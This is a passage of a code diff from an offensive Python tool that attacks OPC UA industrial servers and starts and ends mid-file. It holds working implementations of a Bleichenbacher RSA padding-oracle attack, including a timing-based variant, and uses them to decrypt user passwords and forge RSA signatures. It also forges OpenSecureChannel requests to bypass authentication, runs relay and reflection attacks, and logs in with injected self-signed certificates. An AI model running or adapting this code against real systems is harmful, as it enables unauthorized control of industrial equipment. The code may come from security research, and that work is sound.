ep.securityPolicyUri != SecurityPolicy.AES256_SHA256_RSAPSS and ep.transportProfileUri.endswith('uatcp-uasc-uabinary')] + if tcp_eps: + # Decryption padding oracle is a bit faster when plaintext is already pkcs#1, so prefer that. + tcp_eps.sort(key=lambda ep: ep.securityPolicyUri != SecurityPolicy.BASIC128RSA15) + target = tcp_eps[0] + tproto, thost, tport = parse_endpoint_url(target.endpointUrl) + assert tproto == TransportProtocol.TCP_BINARY + + log(f'No HTTPS endpoints. Trying to bypass secure channel on {target.endpointUrl} via padding oracle.') + chan = bypass_opn(target, target, try_opn_oracle, try_password_oracle, cache_file, timing_threshold, timing_expansion) + log(f'Trying reflection attack (if channel is still alive).') + try: + token = execute_relay_attack(chan, target, chan, target) + except ServerError as err: + if err.errorcode == 0x80870000: + raise AttackNotPossible('Server returning BadSecureChannelTokenUnknown error. Probably means that the channel expired during the time needed for the padding oracle attack.') + elif err.errorcode == 0x807f0000: + raise AttackNotPossible('Server returning BadTcpSecureChannelUnknown error. Probably means that the channel expired during the time needed for the padding oracle attack.') + else: + raise err + + log_success(f'Attack succesfull! Authenticated session set up with {target.endpointUrl}.') + if demo: + demonstrate_access(chan, token, target.securityPolicyUri) + else: + raise AttackNotPossible('No endpoints applicable (TCP/HTTPS transport and a non-None security policy are required; also, support for Aes256_Sha256_RsaPss is currently not implemented yet).') + + else: + raise AttackNotPossible('Server does not support HTTPS endpoint (with non-None security policy). Try with --bypass-opn instead.') + +def relay_attack(source_url : str, target_url : str, demo : bool): + log(f'Attempting relay from {source_url} to {target_url}') + seps = get_endpoints(source_url) + log(f'Listed {len(seps)} endpoints from {source_url}.') + teps = get_endpoints(target_url) + log(f'Listed {len(teps)} endpoints from {target_url}.') + + # Prioritize HTTPS targets with a non-NONE security policy. + teps.sort(key=lambda ep: [not ep.transportProfileUri.endswith('https-uabinary'), ep.securityPolicyUri == SecurityPolicy.NONE]) + + tmpsock = None + prefercert = False + try: + for sep, tep in itertools.product(seps, teps): + # Source must be HTTPS and non-NONE. + if sep.transportProfileUri.endswith('https-uabinary') and sep.securityPolicyUri != SecurityPolicy.NONE: + oraclechan = sep.endpointUrl + supports_usercert = any(p.tokenType == UserTokenType.CERTIFICATE for p in tep.userIdentityTokens) + + if tep.transportProfileUri.endswith('https-uabinary'): + # HTTPS target. + mainchan = tep.endpointUrl + elif tep.transportProfileUri.endswith('uatcp-uasc-uabinary') and tep.securityPolicyUri == SecurityPolicy.NONE and supports_usercert: + # When only a TCP target is available we can still try to spoof a user cert. + tmpsock = connect_and_hello(tep.endpointUrl) + mainchan = unencrypted_opn(tmpsock) + prefercert = True + else: + continue + + log(f'Trying endpoints {sep.endpointUrl} ({sep.securityPolicyUri.name})-> {tep.endpointUrl} ({tep.securityPolicyUri.name})') + token = execute_relay_attack(oraclechan, sep, mainchan, tep, prefercert) + log_success(f'Attack succesfull! Authenticated session set up with {tep.endpointUrl}.') + if demo: + demonstrate_access(mainchan, token, tep.securityPolicyUri) + return + + raise AttackNotPossible('TODO: implement --bypass-opn for relay attack.') + except ServerError as err: + if err.errorcode == 0x80550000 and target_url.startswith('opc.tcp'): + raise AttackNotPossible('Security policy rejected by server. Perhaps user authentication over NONE channel is blocked.') + else: + raise err + finally: + if tmpsock: + tmpsock.shutdown(SHUT_RDWR) + tmpsock.close() + +class PaddingOracle(ABC): + def __init__(self, endpoint : endpointDescription.Type): + self._endpoint = endpoint + self._active = False + self._has_timed_out = False + + @abstractmethod + def _setup(self): + ... + + @abstractmethod + def _cleanup(self): + ... + + @abstractmethod + def _attempt_query(self, ciphertext : bool) -> bool: + ... + + # Pick an applicable and preferred endpoint. + @classmethod + @abstractmethod + def pick_endpoint(clazz, endpoints : List[endpointDescription.Type]) -> Optional[endpointDescription.Type]: + ... + + def query(self, ciphertext : bytes): + if self._active and not self._has_timed_out: + try: + return self._attempt_query(ciphertext) + except KeyboardInterrupt as ex: + # Don't retry when user CTRL+C's. + raise ex + except (TimeoutError, ConnectionResetError): + # Stop reusing connections once a timeout or connection reset has happened once. + self._has_timed_out = True + except: + # On any misc. exception, assume the connection is broken and reset it. + try: + self._cleanup() + except: + pass + + self._setup() + self._active = True + return self._attempt_query(ciphertext) + +# For some reason, one implementation leaves the TCP connection open after failure but stops responding. Put a +# timeout on the socket (kinda arbitrarily picked 10 seconds) to cause a breaking exception when this happens. +PO_SOCKET_TIMEOUT = 10 + +class OPNPaddingOracle(PaddingOracle): + def _setup(self): + self._socket = connect_and_hello(self._endpoint.endpointUrl) + self._msg = OpenSecureChannelMessage( + secureChannelId=0, + securityPolicyUri=SecurityPolicy.BASIC128RSA15, + senderCertificate=self._endpoint.serverCertificate, + receiverCertificateThumbprint=certificate_thumbprint(self._endpoint.serverCertificate), + encodedPart=b'' + ) + + self._socket.settimeout(PO_SOCKET_TIMEOUT) + + def _cleanup(self): + self._socket.shutdown(SHUT_RDWR) + self._socket.close() + + def _attempt_query(self, ciphertext): + try: + self._msg.encodedPart = ciphertext + opc_exchange(self._socket, self._msg) + return True + except ServerError as err: + if err.errorcode == 0x80580000: + return True + elif err.errorcode == 0x80130000: + return False + elif err.errorcode == 0x80010000: + # Prosys specific oracle. + return 'block incorrect' not in err.reason + else: + raise err + + @classmethod + def pick_endpoint(clazz, endpoints): + return max( + (ep for ep in endpoints if ep.transportProfileUri.endswith('uatcp-uasc-uabinary')), + key=lambda ep: ep.securityPolicyUri == SecurityPolicy.BASIC128RSA15, + default=None + ) + +class PasswordPaddingOracle(PaddingOracle): + def __init__(self, + endpoint : endpointDescription.Type, + goodpadding_errors = [0x80200000, 0x80130000], + badpadding_errors = [0x80210000, 0x801f0000, 0x80b00000], + ): + super().__init__(endpoint) + self._policyId = self._preferred_tokenpolicy(endpoint).policyId + self._goodpad = goodpadding_errors + self._badpad = badpadding_errors + + + @classmethod + def _preferred_tokenpolicy(_, endpoint): + policies = sorted(endpoint.userIdentityTokens, reverse=True, + key=lambda t: ( + t.tokenType == UserTokenType.USERNAME, + t.securityPolicyUri == SecurityPolicy.BASIC128RSA15, + t.securityPolicyUri is None or t.securityPolicyUri == SecurityPolicy.NONE, + ) + ) + + if policies and policies[0].tokenType == UserTokenType.USERNAME: + return policies[0] + else: + return None + + + def _setup(self): + proto, _, _ = parse_endpoint_url(self._endpoint.endpointUrl) + if proto == TransportProtocol.TCP_BINARY: + sock = connect_and_hello(self._endpoint.endpointUrl) + self._chan = unencrypted_opn(sock) + else: + assert proto == TransportProtocol.HTTPS + self._chan = self._endpoint.endpointUrl + + # Just reflect session data during CreateSession. + sresp = generic_exchange(self._chan, SecurityPolicy.NONE, createSessionRequest, createSessionResponse, + requestHeader=simple_requestheader(), + clientDescription=self._endpoint.server, + serverUri=self._endpoint.server.applicationUri, + endpointUrl=self._endpoint.endpointUrl, + sessionName=None, + clientNonce=os.urandom(32), + clientCertificate=self._endpoint.serverCertificate, + requestedSessionTimeout=600000, + maxResponseMessageSize=2**24, + ) + self._header = simple_requestheader(sresp.authenticationToken) + + def _cleanup(self): + if type(self._chan) == ChannelState: + self._chan.sock.shutdown(SHUT_RDWR) + self._chan.sock.close() + + def _attempt_query(self, ciphertext): + token = userNameIdentityToken.create( + policyId=self._policyId, + userName='pwdtestnotarealuser', + password=ciphertext, + encryptionAlgorithm='http://www.w3.org/2001/04/xmlenc#rsa-1_5', + ) + + try: + generic_exchange(self._chan, SecurityPolicy.NONE, activateSessionRequest, activateSessionResponse, + requestHeader=self._header, + clientSignature=signatureData.create(algorithm=None, signature=None), + clientSoftwareCertificates=[], + localeIds=[], + userIdentityToken=token, + userTokenSignature=signatureData.create(algorithm=None, signature=None), + ) + return True + except ServerError as err: + # print(hex(err.errorcode)) + if err.errorcode in self._goodpad: + # print('.', end='', file=sys.stderr, flush=True) + return False + elif err.errorcode in self._badpad: + return True + else: + raise err + + @classmethod + def pick_endpoint(clazz, endpoints): + # Only works with None security policy and password login support. + options = [ep + for ep in endpoints if ep.securityPolicyUri == SecurityPolicy.NONE and \ + any(t.tokenType == UserTokenType.USERNAME for t in ep.userIdentityTokens) + ] + + if not options: + return None + + # Prefer endpoints that actually advertise PKCS#1 (if not, they may still accept it). + # Otherwise, prefer None over OAEP (upgrade more likely accepted than downgrade). + # Security policies being equal, prefer binary transport. + return max(options, + key=lambda ep: ( + clazz._preferred_tokenpolicy(ep).securityPolicyUri == SecurityPolicy.BASIC128RSA15, + clazz._preferred_tokenpolicy(ep).securityPolicyUri in [None, SecurityPolicy.NONE], + ep.transportProfileUri.endswith('uatcp-uasc-uabinary') + ) + ) + +class AltPasswordPaddingOracle(PasswordPaddingOracle): + # Different interpretation of error codes. + def __init__(self, endpoint): + super().__init__(endpoint, [0x80130000], [0x80200000, 0x80210000, 0x801f0000, 0x80b00000]) + + +class TimingBasedPaddingOracle(PaddingOracle): + def __init__(self, + endpoint, + base_oracle : PaddingOracle, # Padding oracle technique to use for timing when False is returned. + timing_threshold : float = 0.5, # When processing takes longer than this many seconds, asumming correct padding. + ctext_expansion : int = 50, # How many times bigger to repeat the ciphertext + verify_repeats : int = 2, # How many times to repeat 'slow' query before confidence that padding is correct. + ): + super().__init__(endpoint) + self._base = base_oracle + self._threshold = timing_threshold + self._repeats = verify_repeats + self._expansion = ctext_expansion + + def _setup(self): + # To improve reliability, repeat setup for every single attempt. + pass + + def _cleanup(self): + pass + + def _attempt_query(self, ciphertext): + self._base._setup() + payload = ciphertext * self._expansion + start = time.time() + try: + retval = self._base._attempt_query(payload) + except: + retval = False + duration = time.time() - start + + try: + self._base._cleanup() + except: + pass + + if retval: + # Apperantly no timing is needed for this one. Edge case that can occur on initial ciphertext. + return True + elif duration > self._threshold: + # Padding seems correct. Repeat with clean connections to gain certainty. + for i in range(0, self._repeats): + self._base._setup() + start = time.time() + try: + self._base._attempt_query(payload) + except: + pass + duration = time.time() - start + + try: + self._base._cleanup() + except: + pass + + if duration < self._threshold: + return False + + # Padding must be right! + return True + else: + return False + + + @classmethod + def pick_endpoint(clazz, endpoints): + raise Exception('Call this on base oracle.') + +# Carry out a padding oracle attack against a Basic128Rsa15 endpoint. +# Result is ciphertext**d mod n (encoded big endian; any padding not removed). +# Can also be used for signature forging. +def rsa_decryptor(oracle : PaddingOracle, certificate : bytes, ciphertext : bytes) -> bytes: + # Bleichenbacher's original attack: https://archiv.infsec.ethz.ch/education/fs08/secsem/bleichenbacher98.pdf + clen = len(ciphertext) + assert clen % 128 == 0 # Probably not an RSA ciphertext if the key size is not a multiple of 1024 bits. + k = clen * 8 + + # Ciphertext as integer. + c = 0 + for by in ciphertext: + c *= 256 + c += by + + # Extract public key from the endpoint certificate. + n, e = certificate_publickey_numbers(certificate) + + # B encodes as 00 01 00 00 00 .. 00 00 + B = 2**(k-16) + + # Metrics for progress reporting. + query_count = 0 + i = 0 + msize = f'{Decimal(B):.2E}' + + # Oracle function. + def query(candidate): + nonlocal query_count + + # Encode int as bigendian binary to submit it to the oracle. + result = oracle.query(int2bytes(candidate, clen)) + + # Report progress for every query. + query_count += 1 + spinnything = '/-\\|'[(query_count // 30) % 4] + print(f'[{spinnything}] Progress: iteration {i}; interval size: {msize}; oracle queries: {query_count}', end='\r', file=sys.stderr, flush=True) + + return result + + # Step 1: blinding. Find a random blind that makes the padding valid. Searching can be skipped if the ciphertext + # already has valid padding. + # print('step 1') + if query(c): + s0 = 1 + c0 = c + else: + while True: + s0 = randint(1, n) + c0 = c * pow(s0, e, n) % n + if query(c0): + # print(f'c0={c0}', flush=True) + break + + test_factor = lambda sval: query(c0 * pow(sval, e, n) % n) + + M_i = {(2 * B, 3 * B - 1)} + i = 1 + s_i = ceildiv(n, 3*B) + + while True: + # Step 2: searching for PKCS#1 conforming messages. + # print(f'step 2; i={i}; s_i={s_i}; M_i={[(hex(a), hex(b)) for a,b in M_i]}', flush=True) + if i == 1: + # 2a: starting the search. + while not test_factor(s_i): + s_i += 1 + elif len(M_i) > 1: + # 2b: searching with more than one interval left + s_i += 1 + while not test_factor(s_i): + s_i += 1 + else: + # 2c: searching with one interval left + (a, b) = next(iter(M_i)) + r_i = ceildiv(2 * (b * s_i - 2 * B), n) + done = False + while not done: + # print(f'r_i={r_i}; {ceildiv(2 * B + r_i * n, b)} <= new_s < {ceildiv(3 * B + r_i * n, a)}', file=sys.stderr, flush=True) + for new_s in range(ceildiv(2 * B + r_i * n, b), ceildiv(3 * B + r_i * n, a)): + if test_factor(new_s): + s_i = new_s + done = True + break + r_i += 1 + + # Step 3: Narrowing the set of solutions. + # print(f'step 3; s_i={s_i}',flush=True) + M_i = { + (max(a, ceildiv(2*B+r*n, s_i)), min(b, (3*B-1+r*n) // s_i)) + for a, b in M_i + for r in range(ceildiv(a*s_i-3*B+1, n), (b*s_i-2*B) // n + 1) + } + msize = f'{Decimal(sum(b - a for a,b in M_i)):.2E}' + + # Step 4: Computing the solution. + if len(M_i) == 1: + # print(f'step 4',flush=True) + a, b = next(iter(M_i)) + if a == b: + print('', file=sys.stderr, flush=True) + m = a * pow(s0, -1, n) % n + return bytes([(m >> bits) & 0xff for bits in reversed(range(0, k, 8))]) + + i += 1 + +def padding_oracle_testinputs(keylen : int, pubkey : int, goodpads : int, badpads : int) -> list[tuple[bool,int]]: + # Returns (deterministically generated and shuffled) test cases for padding oracle testing. + # Result elements conists of a bool indicating whether the input has valid PKCS#1 padding, and said input in + # integer form. + + TESTSEED = 0x424242 + rng = Random(TESTSEED) + + # For 'correct' test cases. First pick random padding size and then randomize both padding and data. + datasizes = [rng.randint(0, keylen - 11) for _ in range(0, goodpads)] + padvals = [sum(rng.randint(1,255) << (i * 8) for i in range(0, keylen - ds - 3)) for ds in datasizes] + correctpadding = [ + (2 << 8 * (keylen - 2)) + \ + (padval << 8 * (ds + 1)) + \ + rng.getrandbits(8 * ds) + for padval, ds in zip(padvals, datasizes) + ] + + # As incorrect padding, just pick uniform random numbers modulo n not starting with 0x0002. + wrongpadding = [rng.randint(1, pubkey) for _ in range(0, badpads)] + for i in range(0, badpads): + while wrongpadding[i] >> (8 * (keylen - 2)) == 2: + wrongpadding[i] = rng.randint(1, pubkey) + + # Mix order of correct and incorrect padding. + testcases = [(True, p) for p in correctpadding] + [(False, p) for p in wrongpadding] + rng.shuffle(testcases) + return testcases + +def padding_oracle_quality( + certificate : bytes, oracle : PaddingOracle, + goodpads : int = 100, badpads : int = 100 + ) -> int: + # Gives a score between 0 and 100 on how "strong" the padding oracle is. + # This is determined by encrypting testing 100 plaintexts with correct padding and 100 with incorrect padding. + # The score is based on the number of correct padding correctly reported as such is returned. + # If any incorrectly padded plaintext is reported as valid, 0 is returned. + # Will not catch PaddingOracle exceptions. + + # Extract public key from certificate as Python ints. + keylen = certificate_publickey(certificate).size_in_bytes() + n, e = certificate_publickey_numbers(certificate) + testcases = padding_oracle_testinputs(keylen, n, goodpads, badpads) + + # Perform the test. + score = 0 + for i, (padding_right, plaintext) in enumerate(testcases): + progress = i * 200 // (goodpads + badpads) + progbar = '=' * (progress // 2) + ' ' * (100 - progress // 2) + print(f'[*] Progress: [{progbar}]', file=sys.stderr, end='\r', flush=True) + if oracle.query(int2bytes(pow(plaintext, e, n), keylen)): + if padding_right: + # Correctly identified valid padding. + score += 1 + else: + # Our Bleichenbacher attack can't deal with false negatives. + return 0 + + print(f'[*] Progress: [{"=" * 100}]', file=sys.stderr, flush=True) + return score * 100 // goodpads + + +def find_padding_oracle(url : str, try_opn : bool, try_password : bool, timing_threshold : float, timing_expansion : int) -> tuple[PaddingOracle, endpointDescription.Type]: + # Try finding a working padding oracle against an endpoint. + assert try_opn or try_password + endpoints = get_endpoints(url) + + log(f'Checking {len(endpoints)} endpoints of {url} for RSA padding oracle.') + + possible_oracles = [] + if try_opn: + possible_oracles.append(('OPN', OPNPaddingOracle)) + if try_password: + possible_oracles += [ + ('Password', PasswordPaddingOracle), + ('Password (alt)', AltPasswordPaddingOracle), + ] + + bestname, bestep, bestoracle, bestscore = None, None, None, 0 + for oname, oclass in possible_oracles: + endpoint = oclass.pick_endpoint(endpoints) + if endpoint: + log(f'Endpoint "{endpoint.endpointUrl}" qualifies for {oname} oracle.') + log(f'Trying a bunch of known plaintexts to assess {oname} oracle quality and reliability...') + oracle = oclass(endpoint) + try: + try: + quality = padding_oracle_quality(endpoint.serverCertificate, oracle) + log(f'{oname} padding oracle score: {quality}/100') + except ServerError as err: + if err.errorcode == 0x80550000 and endpoint.securityPolicyUri != SecurityPolicy.BASIC128RSA15: + log(f'Got error 0x80550000 (BadSecurityPolicyRejected). Implies {oname} downgrade to Basic128Rsa15 not accepted.') + else: + log(f'Got server error {hex(err.errorcode)} ("{err.reason}"). Don\'t know how to interpret it. Skipping {oname} oracle.') + quality = 0 + except Exception as ex: + log(f'Exception {type(ex).__name__} raised ("{ex}"). Skipping {oname} oracle.') + quality = 0 + + if quality == 100: + log(f'Great! Let\'s use it.') + return oracle, endpoint + elif quality > bestscore: + bestname, bestep, bestoracle, bestscore = oname, endpoint, oracle, quality + elif quality == 0 and timing_threshold > 0: + log(f'Base {oname} not working. Testing timing-based variant (threshold: {timing_threshold} seconds); this may take a minute.') + toracle = TimingBasedPaddingOracle(endpoint, oclass(endpoint), timing_threshold, timing_expansion) + quality = padding_oracle_quality(endpoint.serverCertificate, toracle, 10, 100) + log(f'Timing-based {oname} padding oracle score: {quality}/100') + + # Prefer non-timing oracles, even if they have (up to three times) more false negatives. + quality = ceildiv(quality, 3) + if quality > bestscore: + bestname, bestep, bestoracle, bestscore = f'Timing-based {oname}', endpoint, toracle, quality + + except ServerError as err: + log(f'Got server error {hex(err.errorcode)} ("{err.reason}"). Don\'t know how to interpret it. Skipping {oname} oracle.') + except Exception as ex: + log(f'Exception {type(ex).__name__} raised ("{ex}"). Skipping {oname} oracle.') + else: + log(f'None of the endpoints qualify for {oname} oracle.') + + if bestscore > 0: + log(f'Continuing with {bestname} padding oracle for endpoint {bestep.endpointUrl}.') + return bestoracle, bestep + elif timing_threshold == 0: + raise AttackNotPossible(f'Can\'t find exploitable padding oracle. Maybe try the timing attack?') + else: + raise AttackNotPossible(f'Can\'t find exploitable padding oracle.') + +def decrypt_attack(url : str, ciphertext : bytes, try_opn : bool, try_password : bool, timing_threshold : float, timing_expansion : int): + # Use padding oracle to decrypt a ciphertext. + # Logs the result, and also tries parsing it. + + oracle, endpoint = find_padding_oracle(url, try_opn, try_password, timing_threshold, timing_expansion) + + log(f'Running padding oracle attack...') + result = rsa_decryptor(oracle, endpoint.serverCertificate, ciphertext) + log_success(f'Success! Raw result: {hexlify(result).decode()}') + + # Check how plaintext is padded and display unpadded version. + unpadded = None + if result.startswith(b'\x00\x02'): + try: + unpadded = remove_rsa_padding(result, SecurityPolicy.BASIC128RSA15) + log(f'Plaintext appears to use PKCS#1v1.5 padding. Unpadded value:') + except: + pass + else: + unpadded = decode_oaep_padding(result, 'sha1') + if unpadded is not None: + log('Plaintext uses OAEP padding (SHA-1 hash). Unpadded value:') + else: + unpadded = decode_oaep_padding(result, 'sha256') + if unpadded is not None: + log('Plaintext uses OAEP padding (SHA-256 hash). Unpadded value:') + + if unpadded is None: + if result.startswith(b'\x00\x01'): + log('Looks like the payload may be a signature instead of a ciphertext.') + else: + log('Result does not look like either PKCS#1v1.5 or OAEP padding. Maybe something went wrong?') + else: + log_success(hexlify(unpadded).decode()) + + # Check if this looks like a password. + try: + lenval, tail = IntField().from_bytes(unpadded) + if 32 <= lenval <= len(tail): + pwd = tail[:lenval-32].decode('utf8') + log('Looks like an encrypted UserIdentityToken with a password.') + log_success(f'Password: {pwd}') + return + except: + pass + + # Check if this looks like an OPN message. + for msgtype in [openSecureChannelRequest, openSecureChannelResponse]: + try: + convo, _ = encodedConversation.from_bytes(unpadded) + msg, _ = msgtype.from_bytes(convo.requestOrResponse) + log('Looks like an OPN message:') + log_success(f'{repr(msg)}') + return + except: + pass + +def forge_signature_attack(url : str, payload : bytes, try_opn : bool, try_password : bool, policy : SecurityPolicy, timing_threshold : float, timing_expansion : int) -> bytes: + # Use padding oracle to forge an RSA PKCS#1 signature on some arbitrary payload. + # Logs and returns signature. + + assert policy != SecurityPolicy.NONE + if policy == SecurityPolicy.AES256_SHA256_RSAPSS: + raise AttackNotPossible('Spoofing PSS signature is possible but currently not yet implemented.') + + hasher = 'sha1' if policy == SecurityPolicy.BASIC128RSA15 else 'sha256' + oracle, endpoint = find_padding_oracle(url, try_opn, try_password, timing_threshold, timing_expansion) + # Compute padded hash to be used as 'ciphertext'. + sigsize = certificate_publickey(endpoint.serverCertificate).size_in_bytes() + padhash = pkcs1v15_signature_encode(hasher, payload, sigsize) + log(f'Padded hash of payload: {hexlify(padhash).decode()}') + log(f'Starting padding oracle attack...') + sig = rsa_decryptor(oracle, endpoint.serverCertificate, padhash) + log_success(f'Succes! Forged signature:') + log_success(hexlify(sig).decode()) + return sig + +def inject_cn_attack(url : str, cn : str, second_login : bool, demo : bool): + log(f'Attempting to log in to {url} with CN {cn} in self-signed certificate.') + + mycert, privkey = selfsign_cert(SELFSIGNED_CERT_TEMPLATE, cn, datetime.now() + timedelta(days=100)) + log(f'Generated self-signed certificate with CN {cn}.') + log(f'SHA-1 thumbprint: {hexlify(certificate_thumbprint(mycert)).decode().upper()}') + + endpoints = get_endpoints(url) log(f'Server advertises {len(endpoints)} endpoints.') - # Try attack against first endpoint with a NONE policy. - none_eps = [ep for ep in endpoints if ep.policy == SecurityPolicy.NONE] - if none_eps: - target = none_eps[0] - log(f'Targeting {target.host}:{target.port} with NONE security policy.') - with connect_and_hello(target.host, target.port) as sock1, connect_and_hello(target.host, target.port) as sock2: - mainchan, oraclechan = unencrypted_opn(sock1), unencrypted_opn(sock2) - token = execute_relay_attack(oraclechan, target, mainchan, target) - log_success(f'Attack succesfull! Authenticated session set up with {target.host}.') - demonstrate_access(mainchan, token) + # Pick any with a non-None policy, preferably with None user authentication. + # Also prefer TCP over HTTPS endpoint; shouldn't matter much for attack, but former is easier to sniff. + ep = max(endpoints, key=lambda ep: [ + ep.securityPolicyUri != SecurityPolicy.NONE, + any(t.tokenType == UserTokenType.ANONYMOUS for t in ep.userIdentityTokens), + ep.transportProfileUri.endswith('uatcp-uasc-uabinary'), + ]) + if ep.securityPolicyUri == SecurityPolicy.NONE: + raise AttackNotPossible('Server only supports None security policy.') + + def trylogin(): + try: + proto, _, _ = parse_endpoint_url(url) + if proto == TransportProtocol.TCP_BINARY: + sock = connect_and_hello(url) + chan = authenticated_opn(sock, ep, mycert, privkey) + log_success('Certificate was accepted during OPN handshake. Will now try to create a session with it.') + else: + assert proto == TransportProtocol.HTTPS + chan = url + + createreply = generic_exchange(chan, ep.securityPolicyUri, createSessionRequest, createSessionResponse, + requestHeader=simple_requestheader(), + clientDescription=applicationDescription.create( + applicationUri=TEMPLATE_APP_URI, + productUri=cn, + applicationName=LocalizedText(text=cn), + applicationType=ApplicationType.CLIENT, + gatewayServerUri=None, + discoveryProfileUri=None, + discoveryUrls=[], + ), + serverUri=ep.server.applicationUri, + endpointUrl=ep.endpointUrl, + sessionName=None, + clientNonce=os.urandom(32), + clientCertificate=mycert, + requestedSessionTimeout=600000, + maxResponseMessageSize=2**24, + ) + if not createreply.serverNonce and ep.securityPolicyUri != SecurityPolicy.NONE: + log('Server did not sign nonce even though security policy is not none. Assuming this indicates authentication failure.') + return None + + log_success('CreateSessionRequest with certificate accepted.') + anon_policies = [p for p in ep.userIdentityTokens if p.tokenType == UserTokenType.ANONYMOUS] + if anon_policies: + log('Trying to activate session.') + activatereply = generic_exchange(chan, ep.securityPolicyUri, activateSessionRequest, activateSessionResponse, + requestHeader=simple_requestheader(createreply.authenticationToken), + clientSignature=signatureData.create( + algorithm=rsa_siguri(ep.securityPolicyUri), + signature=createreply.serverNonce and rsa_sign(ep.securityPolicyUri, privkey, ep.serverCertificate + createreply.serverNonce), + ), + clientSoftwareCertificates=[], + localeIds=[], + userIdentityToken=anonymousIdentityToken.create(policyId=anon_policies[0].policyId), + userTokenSignature=signatureData.create(algorithm=None,signature=None), + ) + log_success('Authentication with certificate was succesfull!') + return chan, createreply.authenticationToken + else: + log(f'Server requires user authentication, which is not implemented for this attack. Will stop here.') + return None + except ServerError as err: + log(f'Login blocked. Server responsed with error {hex(err.errorcode)}: "{err.reason}"') + return None + + log(f'Trying to submit cert to endpoint {ep.endpointUrl}.') + chantoken = trylogin() + + if not chantoken and second_login: + log('Trying the second authentication attempt...') + chantoken = trylogin() + + if chantoken and demo: + demonstrate_access(*chantoken, ep.securityPolicyUri) + + +def forge_opn_request(impersonate_endpoint : endpointDescription.Type, login_endpoint : endpointDescription.Type, opn_oracle : bool, password_oracle : bool, timing_threshold : float, timing_expansion : int) -> OpenSecureChannelMessage: + # Use the padding oracle attack (against impersonate_endpoint) to forge a reusable signed and encrypted OPN request, that can be used against login_endpoint. + assert login_endpoint.securityPolicyUri != SecurityPolicy.NONE + + plaintext = encodedConversation.to_bytes(encodedConversation.create( + sequenceNumber=1, + requestId=1, + requestOrResponse=openSecureChannelRequest.to_bytes(openSecureChannelRequest.create( + requestHeader=simple_requestheader(), + clientProtocolVersion=0, + requestType=SecurityTokenRequestType.ISSUE, + securityMode=login_endpoint.securityMode, + clientNonce=SPOOFED_OPN_NONCE, + requestedLifetime=3600000, # 1000 hours + )) + )) + msg = OpenSecureChannelMessage( + secureChannelId=0, + securityPolicyUri=login_endpoint.securityPolicyUri, + senderCertificate=impersonate_endpoint.serverCertificate, + receiverCertificateThumbprint=certificate_thumbprint(login_endpoint.serverCertificate), + encodedPart=plaintext + ) + + log('Trying sigforge attack to produce OPN signature.') + imp_pk = certificate_publickey(impersonate_endpoint.serverCertificate) + login_pk = certificate_publickey(login_endpoint.serverCertificate) + login_sp = login_endpoint.securityPolicyUri + msg.sign_and_encrypt( + signer=lambda data: forge_signature_attack(impersonate_endpoint.endpointUrl, data, opn_oracle, password_oracle, login_sp, timing_threshold, timing_expansion), + encrypter=lambda ptext: rsa_ecb_encrypt(login_sp, login_pk, ptext), + plainblocksize=rsa_plainblocksize(login_sp, login_pk), + cipherblocksize=login_pk.size_in_bytes(), + sigsize=imp_pk.size_in_bytes(), + ) + + log(f'Message bytes after applying encryption: {hexlify(msg.to_bytes()).decode()}') + return msg + +def bypass_opn(impersonate_endpoint : endpointDescription.Type, login_endpoint : endpointDescription.Type, opn_oracle : bool, password_oracle : bool, cache : Path, timing_threshold : float, timing_expansion : int) -> ChannelState: + lproto, lhost, lport = parse_endpoint_url(login_endpoint.endpointUrl) + if lproto != TransportProtocol.TCP_BINARY: + raise AttackNotPossible('Target endpoint should use opc.tcp protocol.') + + # Attempts to set up a secure channel without knowing the private key, by exploiting a padding oracle twice. + cachedata = {} + if cache.exists(): + try: + with cache.open('r') as infile: + cachedata = json.load(infile) + except: + log(f'Error parsing {cache} contents. Ignoring it and starting a new cache file.') + + # An OPN can be reused as long as the endpoints use the same certificates and security policies. + ep_id = lambda ep: f'{hexlify(certificate_thumbprint(ep.serverCertificate)).decode()}-{ep.securityPolicyUri.name}-{ep.securityMode}' + cachekey = f'{ep_id(impersonate_endpoint)}/{ep_id(login_endpoint)}' + if cachekey in cachedata: + log('Using signed+encrypted OPN request from cache.') + opn_req = OpenSecureChannelMessage() + opn_req.from_bytes(BytesIO(b64decode(cachedata[cachekey]))) + else: + opn_req = forge_opn_request(impersonate_endpoint, login_endpoint, opn_oracle, password_oracle, timing_threshold, timing_expansion) + log(f'Storing signed+encrypted OPN request in cache file {cache}.') + cachedata[cachekey] = b64encode(opn_req.to_bytes()).decode() + with cache.open('w') as outfile: + json.dump(cachedata, outfile) + + log('Picking a padding oracle for decryption.') + oracle, oracle_ep = find_padding_oracle(impersonate_endpoint.endpointUrl, opn_oracle, password_oracle, timing_threshold, timing_expansion) + + log('Performing the OPN handshake...') + login_sock = connect_and_hello(login_endpoint.endpointUrl) + keepalive.set(login_sock) + opn_reply = opc_exchange(login_sock, opn_req) + + log_success('Forged OPN request was accepted. Now keeping this session open while decrypting the first block of the response.') + cipherblocksize = certificate_publickey(oracle_ep.serverCertificate).size_in_bytes() + assert len(opn_reply.encodedPart) % cipherblocksize == 0 + decrypted = rsa_decryptor(oracle, oracle_ep.serverCertificate, opn_reply.encodedPart[:cipherblocksize]) + + log_success(f'Success! Got the following plaintext: {hexlify(decrypted).decode()}') + unpadded = remove_rsa_padding(decrypted, login_endpoint.securityPolicyUri) + if not unpadded: + raise Exception(f'Failed to unpad RSA plaintext {hexlify(decrypted).decode()} (SP: {login_endpoint.securityPolicyUri})') + + # Assuming response fits in single plaintext block. + log('Removed padding. Now parsing OpenSecureChannelResponse to extract channel ID and secret nonce:') + opn_resp, _ = openSecureChannelResponse.from_bytes(encodedConversation.from_bytes(unpadded)[0].requestOrResponse) + log_object('openSecureChannelResponse', opn_resp) + + return ChannelState( + sock=login_sock, + channel_id=opn_resp.securityToken.channelId, + token_id=opn_resp.securityToken.tokenId, + msg_counter=2, + securityMode=login_endpoint.securityMode, + crypto=deriveKeyMaterial(login_endpoint.securityPolicyUri, SPOOFED_OPN_NONCE, opn_resp.serverNonce), + ) + +def log_object(name: str, data : Any, depth : int = 0): + prefix = ' ' * (depth - 1) + '|' if depth > 0 else '' + datadict = None + if isinstance(data, tuple) and hasattr(data, '_asdict'): + datadict = data._asdict() + elif dataclasses.is_dataclass(data): + datadict = dataclasses.asdict(data) + elif type(data) == list: + datadict = dict(enumerate(data)) + + + if datadict: + log(f'{prefix}+ {name} ({type(data).__name__}):') + for fieldname, fieldval in datadict.items(): + log_object(fieldname, fieldval, depth+1) + else: + if type(data) == bytes: + datastr = hexlify(data).decode() + elif type(data) == LocalizedText: + datastr = data.text + elif data is None: + datastr = 'NULL' + else: + datastr = str(data) + + if 